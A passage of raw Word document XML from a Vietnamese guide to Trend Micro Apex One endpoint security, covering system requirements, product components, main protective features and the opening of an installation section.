        <w:t>1.4 GHz minimum (2.0 GHz recommended) Intel Pentium or equivalent (Windows 2008 R2, Windows 2016 family, Windows 2019 family).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112675B4" w14:textId="5053BAB6" w:rsidR="007B2D27" w:rsidRPr="00374B9C" w:rsidRDefault="00FB034C" w:rsidP="00374B9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc152795829"/>
      <w:r w:rsidRPr="00374B9C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Memory</w:t>
      </w:r>
      <w:r w:rsidR="007B2D27" w:rsidRPr="00374B9C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="73A01CE2" w14:textId="77777777" w:rsidR="007B2D27" w:rsidRDefault="007B2D27" w:rsidP="004F2D7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>512 MB minimum (2.0 GB recommended) with at least 100 MB exclusively for Apex One (Windows 2008 R2, 2012 family).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689E2404" w14:textId="571E1D37" w:rsidR="007B2D27" w:rsidRDefault="007B2D27" w:rsidP="004F2D7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>GB minimum (2.0 GB recommended) with at least 100 MB exclusively for Apex One (Windows 7 (x86), 8.1 (x86), Windows Embedded POSReady 7, 10 (x64) family).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0168A4" w14:textId="77777777" w:rsidR="007B2D27" w:rsidRDefault="007B2D27" w:rsidP="004F2D7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>2.0 GB minimum (4.0 GB recommended) with at least 100 MB exclusively for Apex One (Windows 7 (x64), 8.1 (x64), 10 (x64) family).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302BA1EA" w14:textId="3B5BCE2D" w:rsidR="00FB034C" w:rsidRPr="00263DFE" w:rsidRDefault="007B2D27" w:rsidP="004F2D7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>512 MB minimum for Apex One on Mac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CC85E7" w14:textId="2AD28832" w:rsidR="007B2D27" w:rsidRPr="00374B9C" w:rsidRDefault="00963B80" w:rsidP="00374B9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc152795830"/>
      <w:r w:rsidRPr="00374B9C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disk space:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="31D1845A" w14:textId="77777777" w:rsidR="00F21285" w:rsidRDefault="00F21285" w:rsidP="004F2D7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>1.5 GB minimum (3 GB recommended for all products) for Windows, 300 MB minimum for Mac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B893FCB" w14:textId="30020809" w:rsidR="00963B80" w:rsidRPr="00263DFE" w:rsidRDefault="00F21285" w:rsidP="004F2D7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Endpoint Sensor requires minimum 2 GB for Windows platform, 300 MB for Mac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38198E80" w14:textId="55661E3E" w:rsidR="00E31ADF" w:rsidRDefault="00E31ADF" w:rsidP="008D23F6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc152795831"/>
      <w:r w:rsidRPr="001B14DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Thành phần </w:t>
      </w:r>
      <w:r w:rsidR="009178C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>liên kết hỗ trợ</w:t>
      </w:r>
      <w:r w:rsidRPr="001B14DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Apex One</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="2CDB7962" w14:textId="4DCA32AC" w:rsidR="004A7F2F" w:rsidRDefault="004A7F2F" w:rsidP="004A7F2F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="437ACF52" wp14:editId="7A45FA0F">
            <wp:extent cx="5943600" cy="3431540"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="16510"/>
            <wp:docPr id="903906120" name="Picture 903906120" descr="Nền tảng Trend Micro Apex One bản quyền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ền tảng Trend Micro Apex One bản quyền - VinS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solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="425FED89" w14:textId="6AB16067" w:rsidR="00375CAC" w:rsidRDefault="00375CAC" w:rsidP="004A7F2F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00375CAC">
        <w:t>Trend Micro Apex One có thể kết hợp với Cloud One và Network One để bảo vệ toàn diện cho doanh nghiệp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C47EB8" w14:textId="1FE1F03E" w:rsidR="00AD38F6" w:rsidRDefault="00AD38F6" w:rsidP="004A7F2F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27C8389D" wp14:editId="15B04FAF">
            <wp:extent cx="5943600" cy="3355975"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="15875"/>
            <wp:docPr id="1405317075" name="Picture 1405317075" descr="Tổng quan Trend Micro Apex One bản quyền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ổng quan Trend Micro Apex One bản quyền - VinS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solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="544AF3C4" w14:textId="77777777" w:rsidR="00D75C2D" w:rsidRDefault="000207C5" w:rsidP="00A774C9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="000207C5">
        <w:t xml:space="preserve">Trend Micro Apex One </w:t>
      </w:r>
      <w:r w:rsidR="00C213D8">
        <w:t>trong hệ thống</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDCE56A" w14:textId="7CF25FB1" w:rsidR="00E24E2A" w:rsidRDefault="00E24E2A" w:rsidP="004F2D7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Có hai phiên bản Trend Micro Apex One và Apex One SaaS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B59E8DB" w14:textId="77777777" w:rsidR="00E24E2A" w:rsidRDefault="00E24E2A" w:rsidP="004F2D7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Bảo vệ cho thiết bị Windows Endpoint và Mac Endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEC6DB0" w14:textId="6A2F159D" w:rsidR="00E24E2A" w:rsidRDefault="00E24E2A" w:rsidP="004F2D7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Đối với thiết bị Mac sẽ không có Firewall, Application Control, Sandbox Analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716B4338" w14:textId="2C01F61D" w:rsidR="00B52E0C" w:rsidRPr="00B52E0C" w:rsidRDefault="00B52E0C" w:rsidP="008D23F6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc152795832"/>
      <w:r w:rsidRPr="001B14DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Các </w:t>
      </w:r>
      <w:r w:rsidRPr="001B14DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>chức năng chính của Apex One</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="2B2ED3C3" w14:textId="4B8D9A8A" w:rsidR="00E24E2A" w:rsidRDefault="00E24E2A" w:rsidP="00F76765">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3ED62037" wp14:editId="2667F70E">
            <wp:extent cx="5943600" cy="1022985"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="24765"/>
            <wp:docPr id="1869440331" name="Picture 18694403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0331"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22985"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA6A0E2" w14:textId="5319D38C" w:rsidR="004B4ADA" w:rsidRDefault="004B4ADA" w:rsidP="00596502">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Thành phần tính năng của Trend Micro Apex One trên máy trạm</w:t>
      </w:r>
      <w:r w:rsidR="00423415">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4676ECFF" w14:textId="6083F245" w:rsidR="004B4ADA" w:rsidRDefault="004B4ADA" w:rsidP="00B52E0C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Prevention</w:t>
      </w:r>
      <w:r w:rsidR="00E95831">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bao gồm các công nghệ ngăn chặn đối tượng từ Malware đến Attacker</w:t>
      </w:r>
      <w:r w:rsidR="00423415">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6EC5E1" w14:textId="4824D684" w:rsidR="004B4ADA" w:rsidRDefault="004B4ADA" w:rsidP="00B52E0C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Real Time Detection</w:t>
      </w:r>
      <w:r w:rsidR="00E95831">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> phát hiện nhanh mối đe dọa từ endpoint đến email</w:t>
      </w:r>
      <w:r w:rsidR="00423415">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AA415F" w14:textId="0C3FF474" w:rsidR="004B4ADA" w:rsidRDefault="004B4ADA" w:rsidP="00B52E0C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Automated Response</w:t>
      </w:r>
      <w:r w:rsidR="00E95831">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> lập tức đưa ra hành động phản hồi, tích cực bảo vệ</w:t>
      </w:r>
      <w:r w:rsidR="00423415">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524651D1" w14:textId="385AEA2A" w:rsidR="004B4ADA" w:rsidRDefault="004B4ADA" w:rsidP="00B52E0C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Investigation and Response</w:t>
      </w:r>
      <w:r w:rsidR="00E95831">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> đưa ra tầm nhìn tổng quát về mối nguy hại.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E1E0FE" w14:textId="4542E72F" w:rsidR="00FB2A2A" w:rsidRDefault="00FB2A2A" w:rsidP="00F76765">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12068F75" wp14:editId="565013C1">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="28575"/>
            <wp:docPr id="1466882623" name="Picture 1466882623" descr="Apex One Agent Trend Micro Apex One bản quyền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ex One Agent Trend Micro Apex One bản quyền - VinSE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B4A343E" w14:textId="45E20B0E" w:rsidR="00F76765" w:rsidRDefault="0037660A" w:rsidP="0037660A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0037660A">
        <w:t>Thành phần tính năng của Trend Micro Apex One</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C266B90" w14:textId="38390295" w:rsidR="00EA26B5" w:rsidRPr="00EA26B5" w:rsidRDefault="0084336A" w:rsidP="00A96FA7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0084336A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61502BF8" wp14:editId="31487AD6">
            <wp:extent cx="5943600" cy="2702560"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="21590"/>
            <wp:docPr id="451697375" name="Picture 451697375"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7375" name="Picture 1" descr="A diagram of a computer process&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2702560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3288186F" w14:textId="46AF93F3" w:rsidR="00A96FA7" w:rsidRPr="00EA26B5" w:rsidRDefault="00A96FA7" w:rsidP="00A96FA7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00A96FA7">
        <w:t>Trend Micro Apex One phát hiện detection với 4 bước Entry Point, Pre-Execution, Runtime &amp; Exit Point.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF8C988" w14:textId="4DBDECEA" w:rsidR="007017BA" w:rsidRDefault="007017BA" w:rsidP="002B2433">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Web Reputation: Chặn các truy cập từ Kernel Level chứ không chỉ từ trình duyệt web browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26582862" w14:textId="3B4A6264" w:rsidR="007017BA" w:rsidRDefault="007017BA" w:rsidP="002B2433">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Predictive Machine Learning: kiểm tra file tìm unknow threat</w:t>
      </w:r>
      <w:r w:rsidR="009B2D33">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F11FBC0" w14:textId="63ABA76A" w:rsidR="007017BA" w:rsidRDefault="007017BA" w:rsidP="002B2433">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Runtime Machine Learning: kiểm tra hành vi khi được unpack lúc runtime, tìm unknow threat</w:t>
      </w:r>
      <w:r w:rsidR="009B2D33">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF3C32A" w14:textId="7DEB87BD" w:rsidR="007017BA" w:rsidRDefault="007017BA" w:rsidP="002B2433">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Virtual patching: Chặn các lỗ hổng mới.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1592EC41" w14:textId="4B6FF926" w:rsidR="007017BA" w:rsidRDefault="007017BA" w:rsidP="002B2433">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Application Control: chặn các ứng dụng không cần thiết.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407E281B" w14:textId="1A6F7FFF" w:rsidR="007017BA" w:rsidRDefault="007017BA" w:rsidP="002B2433">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Data Loss Prevention: chặn các dữ liệu được định nghĩa là nhạy cảm của doanh nghiệp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5209C7AF" w14:textId="48B3DE73" w:rsidR="007017BA" w:rsidRPr="00EA26B5" w:rsidRDefault="007017BA" w:rsidP="002B2433">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Browser Exploit Prevention: chặn các khai thác lỗ hổng từ các trang nguy hiểm</w:t>
      </w:r>
      <w:r w:rsidR="009B2D33">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E21C542" w14:textId="0848D760" w:rsidR="00D143A0" w:rsidRPr="00EA26B5" w:rsidRDefault="00D143A0" w:rsidP="00D143A0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29125A4C" wp14:editId="2AFDB328">
            <wp:extent cx="5943600" cy="1985645"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="14605"/>
            <wp:docPr id="1054353502" name="Picture 1054353502" descr="Apex One Central Trend Micro Apex One bản quyền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ex One Central Trend Micro Apex One bản quyền - VinS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solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C55774F" w14:textId="61DBB3AB" w:rsidR="00284585" w:rsidRPr="00783311" w:rsidRDefault="008D0AC3" w:rsidP="008D23F6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="008D0AC3">
        <w:t>Quản trị tất cả Endpoint một cách tập trung thuận tiện và dễ dàng</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4221B0" w14:textId="718F441A" w:rsidR="00DF7752" w:rsidRPr="00E81B4D" w:rsidRDefault="00DF7752" w:rsidP="002F6166">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc152795833"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Cài đặt</w:t>
      </w:r>
      <w:r w:rsidR="00D85A4B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> Trend Micro Apex </w:t>
      </w:r>
      <w:r w:rsidR="005909F0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidR="00D85A4B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>ne Server và Agent</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="7416AB99" w14:textId="38EE109D" w:rsidR="00E81B4D" w:rsidRPr="00B41EA0" w:rsidRDefault="0018582B" w:rsidP="002F6166">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc152795834"/>
      <w:r w:rsidRPr="00B41EA0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Tạo tài khoản </w:t>
      </w:r>
      <w:r w:rsidR="00907A7B" w:rsidRPr="00B41EA0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">và đăng ký dịch vụ Trend Micro Apex </w:t>
      </w:r>
      <w:r w:rsidR="00B41EA0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidR="00907A7B" w:rsidRPr="00B41EA0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
